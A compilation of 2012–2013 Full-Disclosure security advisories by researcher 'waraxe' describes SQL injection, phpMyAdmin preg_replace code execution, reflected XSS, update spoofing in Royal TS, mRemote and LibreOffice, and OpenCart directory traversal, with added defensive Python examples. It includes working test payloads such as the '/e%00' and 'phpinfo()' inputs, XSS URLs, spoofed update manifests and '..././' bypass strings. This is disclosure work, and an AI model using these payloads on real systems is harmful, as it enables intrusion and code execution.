[Full-disclosure] [waraxe-2013-SA#104] - Multiple Vulnerabilities in Spider Event Calendar Wordpress Plugin

2013-05-23 Thread Janek Vind

[waraxe-2013-SA#104] - Multiple Vulnerabilities in Spider Event Calendar Wordpress Plugin
===

Author: Janek Vind "waraxe"
Date: 22. May 2013
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-104.html


Description of vulnerable software:
~~~

Spider Event Calendar is a highly configurable plugin which allows you
to have multiple organized events in a calendar. This plugin is one of
the best WordPress Calendar available in WordPress Directory. If you
have problem with organizing your WordPress Calendar events and displaying
them in a calendar format, then Spider WordPress Calendar Plugin is the
best solution.

http://wordpress.org/extend/plugins/spider-event-calendar/
http://web-dorado.com/products/wordpress-calendar.html

The current version, 1.3.0, is vulnerable; older versions were not tested.


###
1. Insufficient access check for AJAX operations in "calendar.php"
###

Reason:
1. weak access control implementation
Preconditions:
1. must be logged in as Wordpress user
Impact:
1. Any Wordpress user can edit Spider Calendar

Php script "calendar.php" line 197:
[ source code start ]--
add_action('wp_ajax_spidercalendarinlineedit', 'spider_calendar_quick_edit');

add_action('wp_ajax_spidercalendarinlineupdate', 
'spider_calendar_quick_update');
function spider_calendar_quick_update(){
    
    global $wpdb;
    
    if(isset($_POST['calendar_id']) && isset($_POST['calendar_title']) && 
isset($_POST['us_12_format_sp_calendar'])){
        $wpdb->update(
...
function spider_calendar_quick_edit(){
    global $wpdb;
    if(isset($_POST['calendar_id'])){
        $row=$wpdb->get_row(
[ source code end ]

We can see that the AJAX actions "wp_ajax_spidercalendarinlineedit" and
"wp_ajax_spidercalendarinlineupdate" are bound to the functions
"spider_calendar_quick_edit" and "spider_calendar_quick_update". These two
functions are meant to be used only by administrators, but nothing stops
low-privileged users: a "wp_ajax_" hook only requires that the caller is logged
in, and neither handler performs a capability or nonce check of its own, so even
users with the "Subscriber" role can call both AJAX actions.

Test:

HTML form (method="post") submitting the POST parameter "calendar_id" to:

http://localhost/wp351/wp-admin/admin-ajax.php?action=spidercalendarinlineedit

Result: calendar editing form will be shown

Remark: This weakness in access control makes the next two SQL injection
vulnerabilities much more critical: there is no need for admin privileges,
even a low-level Wordpress user is able to exploit them.


###
2. SQL Injection in "calendar.php" function "spider_calendar_quick_update"
###

Reason:
1. insufficient sanitization of user-supplied data
Attack vector:
1. user-supplied POST parameter "calendar_id"
Preconditions:
1. must be logged in as Wordpress user


Php script "calendar.php" line 199:
[ source code start ]--
add_action('wp_ajax_spidercalendarinlineupdate', 
'spider_calendar_quick_update');
function spider_calendar_quick_update(){
    
    global $wpdb;
    
    if(isset($_POST['calendar_id']) && isset($_POST['calendar_title']) && 
        isset($_POST['us_12_format_sp_calendar'])){
...
        $row=$wpdb->get_row("SELECT * FROM 
".$wpdb->prefix."spidercalendar_calendar
    WHERE id=".$_POST['calendar_id']);
[ source code end ]

As seen above, user-supplied POST parameter "calendar_id" is used in SQL query
without any sanitization, resulting in SQL injection vulnerability.

Test:

HTML form (method="post") submitting the POST parameters "calendar_id",
"calendar_title" and "us_12_format_sp_calendar" to:

http://localhost/wp351/wp-admin/admin-ajax.php?action=spidercalendarinlineupdate

Result: on success, sensitive information about the Wordpress user with ID 1
is revealed: username, password hash and email.


###
3. SQL Injection in "calendar.php" function "spider_calendar_quick_edit"
###

Reason:
1. insufficient sanitization of user-supplied data
Attack vector:
1. user-supplied POST parameter "calendar_id"
Precondi

[Full-disclosure] [waraxe-2013-SA#103] - Multiple Vulnerabilities in phpMyAdmin

2013-04-24 Thread Janek Vind

[waraxe-2013-SA#103] - Multiple Vulnerabilities in phpMyAdmin
===

Author: Janek Vind "waraxe"
Date: 25. April 2013
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-103.html


Description of vulnerable software:
~~~

phpMyAdmin is a free software tool written in PHP, intended to handle the
administration of MySQL over the World Wide Web. phpMyAdmin supports a wide
range of operations with MySQL.

http://www.phpmyadmin.net/home_page/index.php


###
1. Remote code execution via preg_replace() in "libraries/mult_submits.inc.php"
###

Reason:
  1. insufficient sanitization of user data before using in preg_replace
Attack vectors:
  1. user-supplied parameters "from_prefix" and "to_prefix"
Preconditions:
  1. logged in as valid PMA user
  2. PHP version < 5.4.7 (newer versions refuse the pattern with
     "Warning: preg_replace(): Null byte in regex")
  
PMA security advisory: PMASA-2013-2
CVE id: CVE-2013-3238

Affected phpMyAdmin versions: 3.5.8 and 4.0.0-RC2
  
Result: PMA user is able to execute arbitrary PHP code on webserver

Let's take a look at the source code:

Php script "libraries/mult_submits.inc.php" line 426 (PMA version 3.5.8):
[ source code start ]--
case 'replace_prefix_tbl':
    $current = $selected[$i];
    $newtablename = preg_replace("/^" . $from_prefix . "/", $to_prefix, $current);
    $a_query = 'ALTER TABLE ' . PMA_backquote($selected[$i]) . ' RENAME ' .
        PMA_backquote($newtablename) ; // CHANGE PREFIX PATTERN
    $run_parts = true;
    break;

case 'copy_tbl_change_prefix':
    $current = $selected[$i];
    $newtablename = preg_replace("/^" . $from_prefix . "/", $to_prefix, $current);
    $a_query = 'CREATE TABLE ' . PMA_backquote($newtablename) . ' SELECT * FROM '
      . PMA_backquote($selected[$i]) ; // COPY TABLE AND CHANGE PREFIX PATTERN
    $run_parts = true;
    break;
[ source code end ]

We can see that the PHP variables "$from_prefix" and "$to_prefix" are used in
preg_replace() without any sanitization. These variables come from the
user-submitted POST request as parameters "from_prefix" and "to_prefix".
Because "$from_prefix" is concatenated directly after the opening delimiter, an
attacker can close the pattern early with "/", append the "e" modifier and hide
the script's own trailing "/" behind a terminating null byte; "$to_prefix" then
becomes the replacement string, which the e-modifier evaluates as PHP code. On
successful exploitation the injected PHP code is executed on the PMA webserver.
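To make the delimiter trick concrete, here is an added example in Python that is not phpMyAdmin code: it models how PHP's preg_* wrapper splits a delimited pattern into body and modifiers (including the pre-5.4.7 behaviour where a NUL byte ends the pattern), applies that to the exact string the vulnerable lines build, and ports preg_quote() to show what the fixed caller has to do. The modifier letter set and the escaping table are those of PHP's PCRE wrapper; nothing else is assumed.

```python
"""Added example, not phpMyAdmin code: how PHP carves "/^" . $from_prefix . "/"
into body and modifiers, and the preg_quote()-style escaping a fixed caller needs."""

# Modifier letters PHP's PCRE wrapper accepts; space and newline are ignored.
PHP_PCRE_MODIFIERS = set("imsxeADSUXJu")
# Characters PHP's preg_quote() escapes (plus the delimiter passed in).
PREG_QUOTE_SPECIAL = set(".\\+*?[^]$(){}=!<>|:-#")


def build_pattern(from_prefix: str) -> str:
    """Exactly the concatenation on the vulnerable lines."""
    return "/^" + from_prefix + "/"


def pcre_split(pattern: str, php_before_547: bool) -> tuple:
    """Return (body, modifiers) as PHP's pattern parser sees them.
    Before PHP 5.4.7 the pattern was walked as a C string, so a NUL byte ended
    it; from 5.4.7 on a NUL anywhere is rejected ("Null byte in regex")."""
    if "\x00" in pattern:
        if not php_before_547:
            raise ValueError("preg_replace(): Null byte in regex")
        pattern = pattern.split("\x00", 1)[0]
    delim = pattern[0]
    i = 1
    while i < len(pattern):
        if pattern[i] == "\\" and i + 1 < len(pattern):
            i += 2                      # escaped char, including an escaped delimiter
            continue
        if pattern[i] == delim:         # first unescaped delimiter ends the body
            break
        i += 1
    else:
        raise ValueError("preg_replace(): No ending delimiter")
    body, modifiers = pattern[1:i], pattern[i + 1:]
    for m in modifiers:
        if m not in PHP_PCRE_MODIFIERS and m not in " \n":
            raise ValueError(f"preg_replace(): Unknown modifier '{m}'")
    return body, modifiers.strip()


def eval_modifier_injected(from_prefix: str, php_before_547: bool = True) -> bool:
    """True when the attacker-controlled prefix switches on /e, i.e. the
    replacement string ($to_prefix) will be evaluated as PHP code."""
    try:
        _, modifiers = pcre_split(build_pattern(from_prefix), php_before_547)
    except ValueError:
        return False                    # PHP refuses the pattern; preg_replace() returns NULL
    return "e" in modifiers


def preg_quote(text: str, delimiter: str = "/") -> str:
    """Port of PHP's preg_quote(): escape regex metacharacters and the delimiter,
    and render NUL as \\000 so it can neither truncate nor terminate the pattern."""
    out = []
    for ch in text:
        if ch == "\x00":
            out.append("\\000")
        elif ch in PREG_QUOTE_SPECIAL or ch == delimiter:
            out.append("\\" + ch)
        else:
            out.append(ch)
    return "".join(out)


def build_safe_pattern(from_prefix: str) -> str:
    """What the fixed caller should build: the prefix is matched literally."""
    return "/^" + preg_quote(from_prefix, "/") + "/"
```

With the prefix "/e" alone the trailing "/" becomes an unknown modifier and preg_replace() fails, which is why the null byte is essential on PHP < 5.4.7. Escaping is only part of the fix: PHP 5.5 deprecated the e-modifier and PHP 7 removed it, so a callback via preg_replace_callback() is the durable replacement for any code that still relies on /e.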

Tests:

1. Log in to PMA and select database:

http://localhost/PMA/index.php?db=test&token=25a6ce9e288070bd28c3f9aebffad1b8

2. select one table from database by using checkbox and then select 
"Replace table prefix" from select control "With selected:".

3. We can see form named "Replace table prefix:" with two input fields.
Type "/e%00" to the "From" field and "phpinfo()" to the "To" field.

4. Activate Tamper Data Firefox add-on:

https://addons.mozilla.org/en-us/firefox/addon/tamper-data/

5. Click "Submit", Tamper Data pops up, choose "Tamper".

6. Now we can modify POST request. Look for parameter "from_prefix".
It should be "%2Fe%2500", remove "25", so that it becomes "%2Fe%00".
Click "OK" and Firefox will send out manipulated POST request.

7. We are greeted by phpinfo function output - code execution is confirmed.

PMA version 4.0.0-RC2 contains almost identical vulnerability:

Php script "libraries/mult_submits.inc.php" line 482 (PMA version 4.0.0-RC2):
[ source code start ]--
case 'replace_prefix_tbl':
    $current = $selected[$i];
    $newtablename = preg_replace("/^" . $_POST['from_prefix'] . "/",
        $_POST['to_prefix'], $current);
    $a_query = 'ALTER TABLE ' . PMA_Util::backquote($selected[$i]) .
        ' RENAME ' . PMA_Util::backquote($newtablename); // CHANGE PREFIX PATTERN
    $run_parts = true;
    break;

case 'copy_tbl_change_prefix':
    $current = $selected[$i];
    $newtablename = preg_replace("/^" . $_POST['from_prefix'] . "/",
        $_POST['to_prefix'], $current);
    $a_query = 'CREATE TABLE ' . PMA_Util::backquote($newtablename) .
      ' SELECT * FROM ' . PMA_Util::backquote($selected[$i]); // COPY TABLE AND CHANGE PREFIX PATTERN
    $run_parts = true;
 

[Full-disclosure] [waraxe-2013-SA#102] - Reflected XSS in phpMyAdmin 3.5.7

2013-04-09 Thread Janek Vind

[waraxe-2013-SA#102] - Reflected XSS in phpMyAdmin 3.5.7
===

Author: Janek Vind "waraxe"
Date: 09. April 2013
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-102.html


Description of vulnerable software:
~~~

phpMyAdmin is a free software tool written in PHP, intended to handle the
administration of MySQL over the World Wide Web. phpMyAdmin supports a wide
range of operations with MySQL.

http://www.phpmyadmin.net/home_page/index.php

Affected are versions 3.5.0 to 3.5.7, older versions not vulnerable.


###
1. Reflected XSS in "tbl_gis_visualization.php"
###

Reason:
1. insufficient sanitization of html output
Attack vectors:
1. user-supplied parameters "visualizationSettings[width]" and 
"visualizationSettings[height]"
Preconditions:
1. valid session
2. "token" parameter must be known
3. valid database name must be known


Php script "tbl_gis_visualization.php" line 51:
[ source code start ]--
// Get settings if any posted
$visualizationSettings = array();
if (PMA_isValid($_REQUEST['visualizationSettings'], 'array')) {
    $visualizationSettings = $_REQUEST['visualizationSettings'];
...


[ source code end ]


Tests (parameters "db" and "token" must be valid):

http://localhost/PMA/tbl_gis_visualization.php?db=information_schema&token=17961b7ab247b6d2b39d730bf336cebb&visualizationSettings[width]=">alert(123);

http://localhost/PMA/tbl_gis_visualization.php?db=information_schema&token=17961b7ab247b6d2b39d730bf336cebb&visualizationSettings[height]=">alert(123);


Result: javascript alert box pops up, confirming Reflected XSS vulnerability.


Disclosure timeline:
~~~

31.03.2013 -> Sent email to developers
31.03.2013 -> First response email from developers
02.04.2013 -> Second email from developers - XSS patched in Git repository
03.04.2013 -> phpMyAdmin 3.5.8-rc1 is released
08.04.2013 -> phpMyAdmin 3.5.8 is released
09.04.2013 -> public advisory released


Contact:
~~~

come2war...@yahoo.com
Janek Vind "waraxe"

Waraxe forum:  http://www.waraxe.us/forums.html
Personal homepage: http://www.janekvind.com/
Random project: http://albumnow.com/
-- [ EOF ] ___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [waraxe-2013-SA#101] - Update Spoofing Vulnerability in Royal TS 2.1

2013-03-29 Thread Janek Vind

[waraxe-2013-SA#101] - Update Spoofing Vulnerability in Royal TS 2.1.5
===

Author: Janek Vind "waraxe"
Date: 29. March 2013
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-101.html


Description of vulnerable software:
~~~

Royal TS is a simple, yet powerful tool for administrators, developers,
system engineers and many other IT focused information workers that supports
them in working effortless with their remote systems or management consoles.

http://www.royalts.com/main/home/win.aspx

Vulnerable is version 2.1.5, other versions not tested.


###
1. Update Spoofing Vulnerability
###

Current version of Royal TS contains security vulnerability in update mechanism,
which can be exploited by malicious people to conduct spoofing attacks.

When checking for updates, Royal TS issues GET request over HTTP:

GET /dl/RoyalTS/VersionInfo.xml?r=9:54:35%20PM HTTP/1.1
Cache-Control: no-cache
Host: www.royalts.com
Connection: Keep-Alive


Server response:

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Fri, 16 Nov 2012 11:13:01 GMT
Accept-Ranges: bytes
ETag: "d11e6057ebc3cd1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Thu, 28 Mar 2013 19:54:39 GMT
Content-Length: 13375


(XML response body; element tags lost in this copy, namespaces and values in
document order; the values 2/1/5/61116 are the version and build, as the
installer file name shows)

namespaces: http://www.w3.org/2001/XMLSchema
            http://www.w3.org/2001/XMLSchema-instance
  2
  1
  5
  61116
  http://www.royalts.com/dl/RoyalTS/RoyalTSInstaller_2.01.05.61116.msi
  <html lang="en" xmlns="http://www.w3.org/1999/xhtml"> ...

Royal TS user can click "Start Download" button and Royal TS
will open web browser with download starting dialog.

This update mechanism has a security flaw:

The update check is done over an unencrypted HTTP channel. A malicious third
party in a Man-in-the-Middle (MitM) position can spoof the server response
and in this way instruct the user to download a malicious update.


Testing: tests were done using Windows 7 and Apache webserver. Steps:

1. modify "windows/system32/drivers/etc/hosts" file in order to emulate
DNS spoofing:  127.0.0.1 www.royalts.com

2. create xml file "/dl/RoyalTS/VersionInfo.xml" to the webserver directory
with following content:


(spoofed XML in the same layout as the real response; element tags lost in
this copy)

namespaces: http://www.w3.org/2001/XMLSchema
            http://www.w3.org/2001/XMLSchema-instance
  2
  3
  4
  61116
  http://localhost/calc.exe
  New version 2.3.4 available!


3. Place "calc.exe" file to the webserver main directory.

4. Open Royal TS, it will check for updates automatically, resulting in dialog:

New version 2.3.4 available!


5. Press "Start Download" button. Default web browser window will be open
offering file download:

"You have chosen to open calc.exe"




[Full-disclosure] [waraxe-2013-SA#100] - Update Spoofing Vulnerability in mRemote 1.50

2013-03-29 Thread Janek Vind

[waraxe-2013-SA#100] - Update Spoofing Vulnerability in mRemote 1.50
===

Author: Janek Vind "waraxe"
Date: 29. March 2013
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-100.html


Description of vulnerable software:
~~~

mRemote is a software solution that will allow you to manage all your remote
control connections in a single place. Currently it supports the RDP, VNC,
SSH2 and Telnet protocols.

http://www.royalts.com/main/home/mRemote.aspx
http://mremote-portable.softpile.com/58492/download/

Vulnerable is version 1.50, other versions not tested.


###
1. Update Spoofing Vulnerability
###

Current version of mRemote contains security vulnerability in update mechanism,
which can be exploited by malicious people to conduct spoofing attacks.

When checking for updates, mRemote issues GET request over HTTP:


GET /mRemote_Update.txt HTTP/1.1
Host: update.mremote.org
Connection: Keep-Alive


Server response:

HTTP/1.1 200 OK
Content-Length: 284
Content-Type: text/plain
Last-Modified: Wed, 22 Apr 2009 18:29:48 GMT
Accept-Ranges: bytes
ETag: "16cc425178c3c91:1e75"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 28 Mar 2013 14:03:07 GMT

Version: 1.50
dURL: 
http://www.mremote.org/wiki/GetFile.aspx?File=Downloads/mRemote_1.50_Setup.exe
clURL: http://update.mRemote.org/mRemote_1.50_ChangeLog.txt
imgURL: http://update.mRemote.org/banners/Banner_vRD09.png
imgURLLink: http://www.visionapp.com/vRD2009-highlights.html


mRemote user can click "Download and Install" button and mRemote
will download and install the update.

This update mechanism contains two security flaws:

1. The update check is done over an unencrypted HTTP channel. A malicious third
party in a Man-in-the-Middle (MitM) position can spoof the server response and
in this way instruct mRemote to download a malicious update.

2. mRemote executes the downloaded update without verifying a digital
signature.

Testing: tests were done using Windows 7 and Apache webserver. Steps:

1. modify "windows/system32/drivers/etc/hosts" file in order to emulate
DNS spoofing:  127.0.0.1 update.mremote.org

2. create text file "mRemote_Update.txt" to the webserver main directory
with following content:

Version: 1.51
dURL: http://localhost/calc.exe
clURL: http://localhost/mRemote_1.51_ChangeLog.txt
imgURL: http://update.mRemote.org/banners/Banner_vRD09.png
imgURLLink: http://www.visionapp.com/vRD2009-highlights.html


3. create text file "mRemote_1.51_ChangeLog.txt" to the webserver main
directory with following content:

New version 1.51 available!


4. Place "calc_EN.exe" file to the webserver main directory.

5. Open mRemote, it will check for updates automatically.

Response: New version 1.51 available!

6. Press "Download and Install" button. Successful download ends with response:

Download complete! mRemote will now quit and begin with the installation.

7. Press "OK" button and downloaded exe file will be executed.




[Full-disclosure] [waraxe-2013-SA#099] - Update Spoofing Vulnerability in LibreOffice 4.0.1.2

2013-03-21 Thread Janek Vind

[waraxe-2013-SA#099] - Update Spoofing Vulnerability in LibreOffice 4.0.1.2
===

Author: Janek Vind "waraxe"
Date: 21. March 2013
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-99.html


Description of vulnerable software:
~~~

LibreOffice is a free and open source office suite, developed by The Document
Foundation. It is descended from OpenOffice.org, from which it was forked in 
2010.
The LibreOffice suite includes a word processor, spreadsheet, graphics editor,
slideshow creator, database and math formula writer.

http://www.libreoffice.org/

Affected are versions 3.5.1 to newest 4.0.1.2, older versions were not tested.

###
1. Update Spoofing Vulnerability
###

The current version of LibreOffice contains a security vulnerability in its
update mechanism, which can be exploited by malicious people to conduct
spoofing attacks.

When checking for updates, LibreOffice issues GET request over HTTP:

GET /check.php HTTP/1.1
Connection: TE, close
TE: trailers
Host: update.libreoffice.org
Accept-Encoding: gzip
Pragma: no-cache
Accept-Language: en-US
User-Agent: LibreOffice 4.0 .0.3 (7545bee9c2a0782548772a21bc84a9dcc583b89;
 Windows; x86; BundledLanguages=en-US af am ar as ast be bg bn bn-IN bo ...)


Server at "update.libreoffice.org" responds with XML data:


(XML response; element tags lost in this copy, namespace and values in document
order)

namespace: http://update.libreoffice.org/description
  LibreOffice 4.0.1
  84102822e3d61eb989ddd325abf1ac077904985
  Windows
  x86
  4.0.1
  http://www.libreoffice.org/download/


LibreOffice user can click "Download" and "Install" buttons and LibreOffice
will download and install the update.

This update mechanism contains two security flaws:

1. The update check is done over an unencrypted HTTP channel. A malicious third
party in a Man-in-the-Middle (MitM) position can spoof the server response and
in this way instruct LibreOffice to download a malicious update.

2. LibreOffice executes the downloaded update without verifying a digital
signature.
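All three update advisories above (Royal TS, mRemote and LibreOffice) share the same two defects: an unauthenticated plain-HTTP manifest and no signature check on the installer. The following added example, which is not code from any of those projects, implements the client-side policy that blocks the spoofed manifests used in the tests, using the "Key: value" layout of mRemote's mRemote_Update.txt since that is the one reproduced in full. The trusted host list, the installed version, the installer bytes and the "sha256" manifest field are assumptions made for the example.

```python
"""Added example, not mRemote/Royal TS/LibreOffice code: a client-side policy for
a 'Key: value' update manifest that refuses the plain-HTTP, arbitrary-host
download URL the spoofed manifests rely on, and checks the installer's digest."""
import hashlib
import hmac
import re
from urllib.parse import urlparse

TRUSTED_HOSTS = {"update.mremote.org", "www.mremote.org"}   # assumed allowlist
CURRENT_VERSION = (1, 50)                                   # assumed installed build


class UpdateRejected(Exception):
    pass


def parse_manifest(text: str) -> dict:
    """'Key: value' lines; splitting on the first colon keeps URLs intact."""
    fields = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        key, sep, value = line.partition(":")
        if not sep:
            raise UpdateRejected(f"malformed manifest line: {line!r}")
        fields[key.strip()] = value.strip()
    return fields


def parse_version(text: str) -> tuple:
    if not re.fullmatch(r"\d+(\.\d+)*", text):
        raise UpdateRejected(f"unparseable version {text!r}")
    return tuple(int(p) for p in text.split("."))


def check_url(url: str) -> str:
    """Only https to a pinned host; 'http://localhost/calc.exe' fails both tests."""
    parts = urlparse(url)
    if parts.scheme != "https":
        raise UpdateRejected(f"download URL is not https: {url}")
    if not parts.hostname or parts.hostname.lower() not in TRUSTED_HOSTS:
        raise UpdateRejected(f"download host not trusted: {url}")
    return url


def evaluate(manifest_text: str, current=CURRENT_VERSION):
    """Return the update to offer, or None when nothing newer is announced."""
    fields = parse_manifest(manifest_text)
    version = parse_version(fields.get("Version", ""))
    if version <= current:
        return None
    return {
        "version": version,
        "url": check_url(fields.get("dURL", "")),
        "sha256": fields.get("sha256", "").lower(),   # assumed extra field
    }


def verify_download(blob: bytes, expected_sha256: str) -> str:
    """Refuse to run an installer whose digest differs from the announced one."""
    digest = hashlib.sha256(blob).hexdigest()
    if not expected_sha256 or not hmac.compare_digest(digest, expected_sha256):
        raise UpdateRejected("installer digest mismatch")
    return digest


def rejects(manifest_text: str) -> bool:
    """True when the policy refuses the manifest."""
    try:
        evaluate(manifest_text)
    except UpdateRejected:
        return True
    return False


def download_ok(blob: bytes, expected_sha256: str) -> bool:
    try:
        verify_download(blob, expected_sha256)
    except UpdateRejected:
        return False
    return True


# Constructed fixtures: INSTALLER stands in for a downloaded setup file.
INSTALLER = b"MZ\x90\x00 constructed installer bytes"
GOOD_MANIFEST = (
    "Version: 1.51\n"
    "dURL: https://www.mremote.org/wiki/GetFile.aspx?File=Downloads/mRemote_1.51_Setup.exe\n"
    "clURL: https://update.mremote.org/mRemote_1.51_ChangeLog.txt\n"
    "sha256: " + hashlib.sha256(INSTALLER).hexdigest() + "\n"
)
# The manifest from the mRemote advisory's test step 2, as the spoofing host serves it.
SPOOFED_MANIFEST = (
    "Version: 1.51\n"
    "dURL: http://localhost/calc.exe\n"
    "clURL: http://localhost/mRemote_1.51_ChangeLog.txt\n"
)
```

The digest in the manifest is only as trustworthy as the channel the manifest arrived on, so it adds nothing unless the manifest itself is fetched over TLS with certificate validation or carries a signature the client can verify with a key shipped in the binary. The durable fix, which none of the three products had per the advisories, is a signed installer (or signed manifest) verified before anything is executed.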

Testing: tests were done using Windows 7, Apache and PHP. Steps:

1. modify "windows/system32/drivers/etc/hosts" file in order to emulate
DNS spoofing:  127.0.0.1 update.libreoffice.org

2. create php file "check.php" in the webserver main directory; it echoes a
spoofed copy of the XML response (element tags lost in this copy):

namespace: http://update.libreoffice.org/description
  LibreOffice 5.6.7
  123456789
  Windows
  x86
  5.6.7
  http://localhost/notepad.exe

3. Place "notepad.exe" file to the webserver main directory.

4. Open LibreOffice Writer -> Help -> Check For Updates

Response: LibreOffice 5.6.7 is available.

5. Press "Download" button. Successful download ends with response:

Download of LibreOffice 5.6.7 completed. Ready for installation.

6. Press "Install" button, choose "Yes" and after that Notepad will be opened.




[Full-disclosure] [waraxe-2013-SA#098] - Directory Traversal Vulnerabilities in OpenCart 1.5.5.1

2013-03-19 Thread Janek Vind

[waraxe-2013-SA#098] - Directory Traversal Vulnerabilities in OpenCart 1.5.5.1
===

Author: Janek Vind "waraxe"
Date: 19. March 2013
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-98.html


Description of vulnerable software:
~~~

OpenCart is a turn-key ready "out of the box" shopping cart solution.
You simply install, select your template, add products and your ready to start
accepting orders.

http://www.opencart.com/

Affected are all OpenCart versions, from 1.4.7 to 1.5.5.1, maybe older too.

###
1. Directory Traversal Vulnerabilities in "filemanager.php"
###

Reason: insufficient sanitization of user-supplied data
Attack vectors:
 1. user-supplied POST parameters "directory", "name", "path", "from", "to"
Preconditions:
 1. Logged in as admin with filemanager access privileges
 
Script "filemanager.php" offers OpenCart admins various file-related services:
directory listing and creation, image file listing, file copy/move/unlink,
upload and image resize. By design an OpenCart admin can manage files and
directories only inside the specific subdirectory "image/data/". That means
even with OpenCart admin privileges you are not supposed to reach files and
directories outside "image/data/". So far, so good.
But what about directory traversal? Let's have a look at the source code.

PHP script "admin/controller/common/filemanager.php" line 66:
[ source code start ]--
public function directory() {    
    $json = array();
    
    if (isset($this->request->post['directory'])) {
        $directories = glob(rtrim(DIR_IMAGE . 'data/' . 
           str_replace('../', '', $this->request->post['directory']), '/') . 
           '/*', GLOB_ONLYDIR); 
        
        if ($directories) {
            $i = 0;
        
            foreach ($directories as $directory) {
                $json[$i]['data'] = basename($directory);
                $json[$i]['attributes']['directory'] = 
                   utf8_substr($directory, strlen(DIR_IMAGE . 'data/'));
...
    
    $this->response->setOutput(json_encode($json));
[ source code end ]

We can see that directory traversal is prevented by removing "../" substrings
from user-submitted parameters. At first look this seems secure enough:
if we can't use "../", then directory traversal is impossible, right?
Deeper analysis shows a couple of shortcomings in this filtering method.
First problem: if OpenCart is hosted on Windows, "..\" can be used for
directory traversal, since Windows accepts the backslash as a path separator
and the filter only looks for "../".

Test (parameter "token" must be valid):
-[ test code start ]---
HTML form (method="post") submitting the POST parameter "directory", with a
"..\"-based traversal value, to:

http://localhost/oc1551/admin/index.php?route=common/filemanager/directory&token=92aa6ac32b4c8e7a175c3dc9f7754d25
--[ test code end ]

The server response is in JSON format and contains a listing of subdirectories
outside of the OpenCart main directory.

Second problem: filtering with a single-pass "str_replace" can be tricked with
crafted strings. If we use the substring "..././", the filter removes the inner
"../" and what remains is "../". So the implemented anti-traversal code is
ineffective and can be bypassed.

Test (parameter "token" must be valid):
-[ test code start ]---
HTML form (method="post") submitting the POST parameter "directory", with a
"..././"-based traversal value, to:

http://localhost/oc1551/admin/index.php?route=common/filemanager/directory&token=92aa6ac32b4c8e7a175c3dc9f7754d25
--[ test code end ]

The server response is exactly the same as in the previous test: information
about the directory structure outside of the OpenCart main directory has been
disclosed.
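The two bypasses above, as an added Python example that is not OpenCart code: strip_dotdot() reproduces the single-pass str_replace() filter, and confine() shows the canonicalise-then-compare check that the file manager needs instead of substring deletion. Both base directories are assumed paths.

```python
"""Added example, not OpenCart code: why str_replace('../', '') is not a
traversal filter, and a canonical-path check that actually confines the file
manager to image/data/."""
import ntpath
import posixpath
from typing import Optional

IMAGE_DATA_POSIX = "/var/www/oc/image/data"          # assumed DIR_IMAGE . 'data/'
IMAGE_DATA_WIN = r"C:\xampp\htdocs\oc\image\data"     # assumed Windows install


def strip_dotdot(user_path: str) -> str:
    """The plugin's filter. PHP's str_replace() makes one left-to-right pass
    over the string, and so does Python's str.replace(), so they agree."""
    return user_path.replace("../", "")


def confine(user_path: str, windows: bool = False) -> Optional[str]:
    """Canonicalise base + user_path and accept it only if it still lies under
    base. Normalisation, not substring deletion, is what neutralises '..',
    '..././' and (on Windows) '..\\'. Returns None for anything that escapes."""
    if "\x00" in user_path:
        return None
    if windows:
        base = ntpath.normpath(IMAGE_DATA_WIN)
        # Windows treats both separators alike, so fold them before normalising.
        candidate = ntpath.normpath(ntpath.join(base, user_path.replace("/", "\\")))
        sep = "\\"
    else:
        base = posixpath.normpath(IMAGE_DATA_POSIX)
        candidate = posixpath.normpath(posixpath.join(base, user_path))
        sep = "/"
    if candidate == base or candidate.startswith(base + sep):
        return candidate
    return None
```

Note the order of operations: the raw string "..././..././etc" is harmless to confine(), because "..." is just a directory name; it is the plugin's own filter that turns it into "../../etc". A check that canonicalises first and compares against the base never needs a blacklist of substrings.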

PHP script "filemanager.php" contains 14 uses of "str_replace('../', ''," code.
Most of the public functions in "filemanager.php" are affected by directory
traversal vulnerability:

public function directory() -> listing of subdirectories
public function files() -> listing of image files
public function create() -> creation of new directories
public function delete() -> deletion of arbitrary files and directorie

[Full-disclosure] [waraxe-2012-SA#096] - Multiple Vulnerabilities in Zenphoto 1.4.3.3

2012-11-05 Thread Janek Vind

[waraxe-2012-SA#096] - Multiple Vulnerabilities in Zenphoto 1.4.3.3
===

Author: Janek Vind "waraxe"
Date: 03. November 2012
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-96.html


Description of vulnerable software:
~~~

Zenphoto is a standalone CMS for multimedia focused websites. Our focus lies on
being easy to use and having all the features there when you need them (but out
of the way if you do not.)
Zenphoto features support for images, video and audio formats, and the Zenpage
CMS plugin provides a fully integrated news section (blog) and custom pages to
run entire websites. 

http://www.zenphoto.org/

https://code.google.com/p/zenphoto/

Affected versions: Zenphoto 1.4.3.3 and older
Patched version: Zenphoto 1.4.3.4


###
1. SQL Injection in "zp-core/zp-extensions/failed_access_blocker.php"
###

Reason: insufficient sanitization of user-supplied data
Attack vector: user-supplied HTTP header "X_FORWARDED_FOR"
Preconditions:
 1. plugin "failed_access_blocker" activated (disabled by default)

"failed_access_blocker" plugin will log every failed authentication attempt:
 
Php script "zp-core/zp-extensions/failed_access_blocker.php" line 75:
[ source code start ]--
function failed_access_blocker_adminGate($allow, $page) {
...
 //    add this attempt
 $sql = 'INSERT INTO '.prefix('plugin_storage').' (`type`, `aux`,`data`) VALUES
   ("failed_access", "'.time().'","'.getUserIP().'")';
 query($sql);
 //    check how many times this has happened recently
 $count = db_count('plugin_storage','WHERE `type`="failed_access" AND 
   `data`="'.getUserIP().'"');
[ source code end ]

IP address of the user comes from function "getUserIP()" and is used in SQL
query. Let's look at the function "getUserIP()".

Php script "zp-core/functions.php" line 1979:
[ source code start ]--
function getUserIP() {
    if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
        return sanitize($_SERVER['HTTP_X_FORWARDED_FOR'], 0);
